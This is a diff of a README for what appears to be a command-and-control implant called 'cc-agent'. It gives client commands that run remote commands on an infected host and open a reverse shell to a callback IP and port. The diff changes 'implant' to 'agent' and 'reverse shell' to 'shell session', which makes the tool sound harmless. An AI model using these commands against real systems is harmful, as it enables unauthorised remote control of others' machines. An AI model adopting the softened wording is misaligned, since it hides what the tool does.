JeanBonBeurre34/cc-agent/README.md

 4. run it ```bash ./build.sh```

 ## Executing Commands Remotely
-The implant support the execution of remote command.
+The agent support the execution of remote command.
 You can execute the command and retrieve the result of the command.
 Use the Python client to submit commands to the server:
 ```bash
 python client.py --command "ipconfig"
 ```

-To initiate a reverse shell session, submit the special "shell" command:
+To initiate a shell session, submit the special "shell" command:
 Replace the ip after the shell with your call back ip the port can be changed too.
 ```bash
 python client.py --command "shell 192.168.56.101:4444"